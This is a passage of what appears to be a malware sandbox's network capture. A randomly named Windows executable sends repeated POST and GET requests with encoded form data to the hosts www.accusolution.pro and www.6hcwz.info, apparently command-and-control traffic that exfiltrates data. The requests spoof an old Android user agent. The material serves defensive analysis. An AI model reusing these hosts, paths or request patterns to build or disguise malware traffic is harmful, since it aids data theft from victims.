PZtTT8P0=93bUIEVyu8AlT7+FkAgt04iHaTxxJThyG47Fu/+XXtO+GW0JNDmZf29KkoNXGrs6MBl3cmHHqNSX5bEsNl2VtOYbU7C9/FCNUcJmauESSlk3EZSb5+v+MKwpooSjpl8cVH4/c4hk1+m7rTENBjOVkJQIjg8cerNrsDippH8MdjF5zZfmUwLI0ojUka4VADjTEw==
Jan 15, 2025 19:42:44.020703077 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Wed, 15 Jan 2025 18:42:43 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 15, 2025 19:42:44.020754099 CET	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	64459	185.68.108.243	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:42:45.919780970 CET	844	OUT	POST /s4sk/ HTTP/1.1 Host: www.accusolution.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.accusolution.pro Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.accusolution.pro/s4sk/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 39 33 62 55 49 45 56 79 75 38 41 6c 53 61 75 46 69 68 67 74 38 34 69 41 66 54 78 78 54 6a 68 32 47 34 33 46 75 2b 72 4b 57 62 32 2b 47 33 45 4a 4d 47 47 5a 63 32 39 4b 75 49 4e 53 65 4c 73 7a 4d 42 70 56 63 6b 44 48 71 4e 47 58 35 62 30 73 4e 30 32 57 73 65 59 5a 41 4c 43 2f 69 31 43 4e 55 63 4a 6d 61 76 68 46 53 68 49 33 45 74 57 62 32 2f 75 4d 41 71 78 62 2f 59 53 6a 6a 31 38 69 56 48 35 6f 63 36 56 64 31 38 65 37 72 53 30 4e 42 79 4f 61 76 4a 51 52 6e 67 38 4c 4f 70 55 59 74 48 36 68 32 56 6f 4b 63 7a 63 63 79 66 53 38 46 42 71 66 6d 6f 48 6e 35 64 78 68 4e 41 65 61 66 38 77 6f 36 53 4e 6f 59 7a 65 54 57 47 47 47 32 6b 59 54 6f 4f 67 3d Data Ascii: PZtTT8P0=93bUIEVyu8AlSauFihgt84iAfTxxTjh2G43Fu+rKWb2+G3EJMGGZc29KuINSeLszMBpVckDHqNGX5b0sN02WseYZALC/i1CNUcJmavhFShI3EtWb2/uMAqxb/YSjj18iVH5oc6Vd18e7rS0NByOavJQRng8LOpUYtH6h2VoKczccyfS8FBqfmoHn5dxhNAeaf8wo6SNoYzeTWGGG2kYToOg=
Jan 15, 2025 19:42:46.558798075 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Wed, 15 Jan 2025 18:42:46 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 15, 2025 19:42:46.558815956 CET	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	64460	185.68.108.243	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:42:48.468449116 CET	10926	OUT	POST /s4sk/ HTTP/1.1 Host: www.accusolution.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.accusolution.pro Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.accusolution.pro/s4sk/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 39 33 62 55 49 45 56 79 75 38 41 6c 53 61 75 46 69 68 67 74 38 34 69 41 66 54 78 78 54 6a 68 32 47 34 33 46 75 2b 72 4b 57 59 57 2b 48 46 38 4a 4e 67 4f 5a 53 57 39 4b 6f 34 4e 54 65 4c 74 78 4d 42 68 52 63 6b 50 35 71 4f 2b 58 34 34 38 73 5a 51 69 57 69 65 59 5a 43 4c 43 36 2f 46 44 56 55 59 56 69 61 75 52 46 53 68 49 33 45 72 36 62 2f 4f 75 4d 43 71 77 70 6f 6f 53 76 70 6c 39 50 56 48 67 64 63 36 52 4e 31 50 57 37 71 79 6b 4e 4f 6b 61 61 69 4a 51 54 67 67 39 4f 4f 70 6f 48 74 47 54 61 32 58 49 73 63 78 41 63 7a 4b 71 6d 64 53 79 46 31 59 47 31 68 61 52 43 56 77 36 6a 55 38 38 42 38 42 52 4e 44 67 53 78 54 57 6e 58 7a 33 45 6b 32 5a 57 49 66 50 76 73 44 39 32 2f 6a 33 73 66 46 31 57 75 65 54 31 57 39 61 75 56 42 54 61 39 63 6c 62 6d 64 56 57 54 4a 46 76 48 50 44 75 76 50 4d 38 59 4a 2f 35 4b 75 7a 46 49 6d 72 51 46 36 6e 6d 65 75 4b 6a 54 71 42 2b 76 78 67 51 6f 55 35 7a 59 6d 55 35 59 6b 44 42 66 61 63 38 33 36 33 6e 76 4d 55 54 37 65 6b 39 31 31 30 54 50 4a 39 57 4b 61 [TRUNCATED] Data Ascii: PZtTT8P0=93bUIEVyu8AlSauFihgt84iAfTxxTjh2G43Fu+rKWYW+HF8JNgOZSW9Ko4NTeLtxMBhRckP5qO+X448sZQiWieYZCLC6/FDVUYViauRFShI3Er6b/OuMCqwpooSvpl9PVHgdc6RN1PW7qykNOkaaiJQTgg9OOpoHtGTa2XIscxAczKqmdSyF1YG1haRCVw6jU88B8BRNDgSxTWnXz3Ek2ZWIfPvsD92/j3sfF1WueT1W9auVBTa9clbmdVWTJFvHPDuvPM8YJ/5KuzFImrQF6nmeuKjTqB+vxgQoU5zYmU5YkDBfac8363nvMUT7ek9110TPJ9WKarwz45sTcD6k9IJCDj2/CILvFduqMQRcJykLX2IB4Y8aCZUB/7zoQw5DxFTRWPm+QBu4A+Sr4jv6UJiWbkSlmzaqH0m5nZWHOl+YtP40dS+M1lUBAxQTaY2FWJyooYwDczKo+1yv3GgqRLEF7OvdJ88xZH4QILnQbzjgjR0qxEJ7X/1ymwZztcqTXCBfFd5X6HV56LaPNs9HBpZR6RLdr4kF1DS33979P0+yrjA/GGNegwbCy3SagvZe8xk6ByLc2m787WKJQWK35Z+bdsrPA6wLzHMSsjdPGml7dSwezTw90Wn/uMYO1ZBEiRs1IP9lG5c0T0ftNLjnaQZjfRvVPyzZ28c4tKYvB57rvObgMg9zMUDcjivUmilimX/pmX6P29WZyixhAxid5vnmv06R/tCnnmbaBEVW5BaquUW/PQf4ijrC6la5Alxgcd6znqoPB9VJcPFcRP4WWZ3vIUO5XduAhI9fCEbTHXl4XYGNGqnitqiOQ7r4pJf0+rgZqiou53YWKt/vqaJrqkIKqdDNJjJU/KTUqaq+kB0nKP3xvb9Ku5grUbCFBaqP0lWmPE5GIcqVXZnc7fZsys/HaQei82b1KiNY3wD6sRSXK0pZkRdFerzsX+RNDuL+DYudqfPYQovuOYhurZXT8XQh5aRoxyIC0SvwW14ccnR [TRUNCATED]
Jan 15, 2025 19:42:49.114911079 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Wed, 15 Jan 2025 18:42:49 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 15, 2025 19:42:49.114970922 CET	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	64461	185.68.108.243	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:42:51.015913963 CET	556	OUT	GET /s4sk/?PZtTT8P0=w1z0LxExs9MXILOhkTw/05qIOC9wPz9pW67ass2TZN6sDGg0GyeGaAU8sMVSePVNOj9ELn/nlJfz7v0haQuSr/gZC77LrnvOb7BfL6JpYx8NJq7/9PXIC+k=&-HT0=eZZx0LUhp4u8Nb7 HTTP/1.1 Host: www.accusolution.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Jan 15, 2025 19:42:51.639360905 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Wed, 15 Jan 2025 18:42:51 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 15, 2025 19:42:51.639435053 CET	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	64462	172.67.183.191	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:43:01.729919910 CET	806	OUT	POST /vslm/ HTTP/1.1 Host: www.6hcwz.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.6hcwz.info Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.6hcwz.info/vslm/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 2b 41 51 54 50 7a 78 75 46 6d 65 78 38 4e 62 61 62 6f 70 59 53 33 52 7a 59 6a 51 77 41 58 2b 6d 68 2f 35 37 55 48 50 32 30 39 6d 54 4e 4f 44 56 79 49 39 6e 51 4b 67 47 6d 6d 6e 46 6c 5a 6b 48 63 66 67 79 43 4e 50 59 56 56 67 4d 57 4b 46 77 57 6a 36 71 53 4f 67 66 55 79 31 41 71 4e 30 48 6b 59 44 7a 66 43 75 77 55 6b 61 4c 79 77 59 72 75 49 43 62 41 68 46 63 73 58 48 61 56 33 44 6c 50 2b 2f 5a 64 41 50 73 6f 65 58 6d 6c 61 78 73 4f 4d 48 32 5a 31 44 43 54 63 4e 75 2f 44 7a 35 75 69 6c 35 35 58 43 66 2f 72 53 35 35 4c 64 42 4a 4d 54 6b 78 73 46 48 57 35 6c 46 61 66 44 63 57 41 3d 3d Data Ascii: PZtTT8P0=+AQTPzxuFmex8NbabopYS3RzYjQwAX+mh/57UHP209mTNODVyI9nQKgGmmnFlZkHcfgyCNPYVVgMWKFwWj6qSOgfUy1AqN0HkYDzfCuwUkaLywYruICbAhFcsXHaV3DlP+/ZdAPsoeXmlaxsOMH2Z1DCTcNu/Dz5uil55XCf/rS55LdBJMTkxsFHW5lFafDcWA==
Jan 15, 2025 19:43:02.573676109 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 18:43:02 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B7r6q3QHkNWXvEw5kC%2Bn1QCoiggZAOIzGfezlhhV2yzlADJnQjRIg5L2pXMqZBHSqAtHmrPWv1LAm4i1lmqR4FdrnI8EC0cjEUMmP674bIFqcUM4pS2Sr%2FjwLfL8sGxBRQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902802525a90ab60-YYZ Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13826&min_rtt=13826&rtt_var=6913&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=806&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 64 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 92 dd 6e d3 30 1c c5 ef f7 14 ae af d7 a6 db a0 1d 92 53 1e 05 99 c4 a3 ae 92 38 4a bc 8c dc 25 ad 50 bb 11 c1 4a 11 e3 63 da 04 9b d0 26 75 22 12 30 ba ad 2d 0f b3 38 1f 57 7d 05 94 64 43 43 20 ae 2c fb 1c ff ce f1 5f 46 15 95 29 dc 35 09 68 73 5d 6b 2d a1 db 85 60 b5 b5 04 00 00 48 27 1c 03 a5 8d 2d 9b 70 19 6e f2 8d ea 3a bc 2b 19 58 27 32 74 28 d9 32 99 c5 21 50 98 c1 89 c1 65 b8 45 55 de 96 55 e2 50 85 54 8b cd 32 35 28 a7 58 ab da 0a d6 88 bc 52 ab df 92 38 e5 1a 69 a5 9e 2f 46 7e b2 1d 2c 0b 6f 2a e6 7b 71 f7 24 fa f9 31 f5 76 2b 48 2a 1d a5 db 56 2c 6a 72 40 55 19 6a cc 21 c0 65 9b 10 e4 af 90 21 27 4f b9 d4 c1 0e 2e 3d 10 d8 96 22 43 29 b7 d5 3a 36 6c 21 a9 14 fe 24 fd f7 ae 84 4d 5a e3 cc 78 d2 a1 06 c5 ac a6 30 5d 52 1e 3e 92 9b 6b 8d fb 8d 07 8d 95 d5 b5 e6 6a 63 bd de ac df 83 00 db ae a1 dc 09 41 52 39 49 f4 98 a9 ee 4d a6 4a 9d a2 ba 4e 6d bb a8 5e 9e 17 9a 59 28 58 d3 4a 21 ee 7d 15 b3 91 b8 f8 b6 98 06 59 7f 18 0f 06 d9 c8 cf 4e c7 8b [TRUNCATED] Data Ascii: 1dd}n0S8J%PJc&u"0-8W}dCC ,_F)5hs]k-`H'-pn:+X'2t(2!PeEUUPT25(XR8i/F~,o{q$1v+HV,jr@Uj!e!'O.="C):6l!$MZx0]R>kjcAR9IMJNm^Y(XJ!}YNiA4g@\|^TdrMF2\/A0" &?Q*QG+f?0O^W<v{
Jan 15, 2025 19:43:02.573728085 CET	47	IN	Data Raw: 79 e7 de 2c ba 7a 9b 8c 87 69 38 88 26 67 d7 5e f7 37 18 49 2a 75 f2 01 95 93 41 52 f1 f3 7e 01 c3 60 44 7f 90 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: y,zi8&g^7I*uAR~`D0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	64463	172.67.183.191	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:43:04.582050085 CET	826	OUT	POST /vslm/ HTTP/1.1 Host: www.6hcwz.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.6hcwz.info Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.6hcwz.info/vslm/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 2b 41 51 54 50 7a 78 75 46 6d 65 78 39 75 54 61 5a 4c 42 59 55 58 52 73 55 44 51 77 50 33 2b 39 68 2f 46 37 55 47 4c 6d 30 50 53 54 4e 76 7a 56 31 4b 46 6e 58 4b 67 47 31 6d 6e 4b 36 70 6b 63 63 66 38 51 43 4a 48 59 56 56 30 4d 57 4c 31 77 57 77 69 31 49 2b 67 64 63 53 31 47 67 74 30 48 6b 59 44 7a 66 43 36 61 55 6b 43 4c 79 67 49 72 75 74 32 59 44 68 46 66 72 58 48 61 43 6e 44 68 50 2b 2f 72 64 45 58 57 6f 62 54 6d 6c 65 31 73 4e 64 48 78 58 31 44 49 4f 4d 4d 6b 37 43 75 65 73 44 6f 7a 2b 52 53 67 38 49 6d 6a 31 74 51 62 59 39 79 7a 6a 73 68 30 4c 2b 73 78 58 63 2b 56 4e 46 63 30 6d 6f 57 59 79 53 77 4b 78 70 6b 65 6b 37 74 72 46 76 4d 3d Data Ascii: 